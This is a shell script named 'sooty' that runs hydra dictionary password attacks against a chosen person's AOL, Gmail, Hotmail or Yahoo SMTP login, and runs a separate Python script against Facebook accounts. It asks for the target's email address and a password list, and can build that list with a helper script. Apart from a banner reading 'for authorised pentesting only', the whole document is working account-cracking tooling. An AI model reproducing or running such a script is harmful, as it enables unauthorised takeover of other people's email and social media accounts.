#!/usr/bin/ksh 
#-------------------------------------------------------------------------------------------------
#   sooty                                                                      version 0.1       -
#   (c) silverphish                                                                              -
#                                                                                                -
#   Runs hydra dictionary attack on email clients                                                -
#                                                                                                -
#-------------------------------------------------------------------------------------------------

#-------------------------------------------------------------------------------------------------
#   setup names                                                                                  -
#-------------------------------------------------------------------------------------------------
 THIS_SCRIPT=sooty
 VERZION=0.1
 DATE_STAMP=`date +"%Y%m%d%H%M"`
 LOG=$THIS_SCRIPT.log
 FACEBOOK_PY_DIR=/root/sootyandsweep

clear
echo " "
echo " "
echo " "
echo " "
echo " "
echo "==========================================="
echo "=             Sooty v$VERZION                  ="
echo "=        (c) SilverPhish 2015             ="
echo "=                                         ="
echo "=   **for authorised pentesting only**    ="
echo "==========================================="

#-------------------------------------------------------------------------------------------------
#   build password list?                                                                         -
#-------------------------------------------------------------------------------------------------

echo " "
echo "A valid password list is required to perform these attacks:"
echo " "
EXIT_LOOP=0
USE_SWEEP=N
while [[ $EXIT_LOOP -eq 0 ]]
do
    echo "1. I have a password list, lets crack on"
    echo "2. Help me build one"
    echo "Q. Quit"
    read CHOICE
    echo " "
    case $CHOICE in
           Q)
                echo "Goodbye"
                exit
                ;;
           q)
                echo "Goodbye"
                exit
                ;;
           1)
                EXIT_LOOP=1
                ;;
           2)
                EXIT_LOOP=2
                ;;
           *)
                echo "Invalid selection"
                ;;
    esac
done

 if [ $EXIT_LOOP -eq 2 ]
 then
     echo " "
     USE_SWEEP=Y
     echo "starting sweep to build password list..." 
     ruby sweep.rb
     echo " "
 fi


#-------------------------------------------------------------------------------------------------
#   get user input                                                                               -
#-------------------------------------------------------------------------------------------------

EXIT_LOOP=0
echo "select target:"
while [[ $EXIT_LOOP -eq 0 ]]
do
    echo "1. AOL"
    echo "2. GMAIL"
    echo "3. HOTMAIL"
    echo "4. YAHOO"
    echo "5. FACEBOOK"
    echo "Q. Quit"
    read CHOICE
    echo " "
    case $CHOICE in
           Q)
                echo "Goodbye"
                exit
                ;;
           q)
                echo "Goodbye"
                exit
                ;;
           1)
                TARGET=AOL
                SERVER=smtp.aol.com
                PORT=587
                PROG=HYDRA
                EXIT_LOOP=1
                ;;
           2)
                TARGET=GMAIL
                SERVER=smtp.gmail.com
                PORT=465
                PROG=HYDRA
                EXIT_LOOP=1
                ;;
           3)
                TARGET=HOTMAIL
                SERVER=smtp.live.com
                PORT=587
                PROG=HYDRA
                EXIT_LOOP=1
                ;;
           4)
                TARGET=YAHOO
                SERVER=smtp.mail.yahoo
                PORT=587
                PROG=HYDRA
                EXIT_LOOP=1
                ;;
           5)
                TARGET=FACEBOOK
                PROG=FACEBOOK.PY
                EXIT_LOOP=2
                ;;
           *)
                echo "Invalid selection"
                ;;
    esac
done

 echo "enter targets email addresss in full: "
 read LOGON_ID

 if [ $USE_SWEEP == "Y" ]
 then
    echo "using sweep.lst password list..."
    PW_LIST=sweep.lst
 else
    echo "enter full path and fileame of password list: "
    read PW_LIST
 fi

#-------------------------------------------------------------------------------------------------
#   start attack                                                                                 -
#-------------------------------------------------------------------------------------------------

 echo " "
 echo " "
 echo "launching $TARGET password attack using $PROG."
 echo "Attack against $LOGON_ID will commence in 10 seconds..."
 echo "use ctrl-c to abort attack."
 echo " "
 sleep 10

 if [ $EXIT_LOOP -eq 1 ]
 then
     hydra $SERVER smtp -l $LOGON_ID -P $PW_LIST -s $PORT -S -v -V 
 else
     echo $LOGON_ID > $THIS_SCRIPT.inp
     echo $PW_LIST >> $THIS_SCRIPT.inp
     python $FACEBOOK_PY_DIR/facebook.py < $THIS_SCRIPT.inp
 fi

 echo " "
 echo " "
 echo "$THIS_SCRIPT attack ends @ "`date`

#-------------------------------------------------------------------------------------------------
#   script ends                                                                                  -
#-------------------------------------------------------------------------------------------------
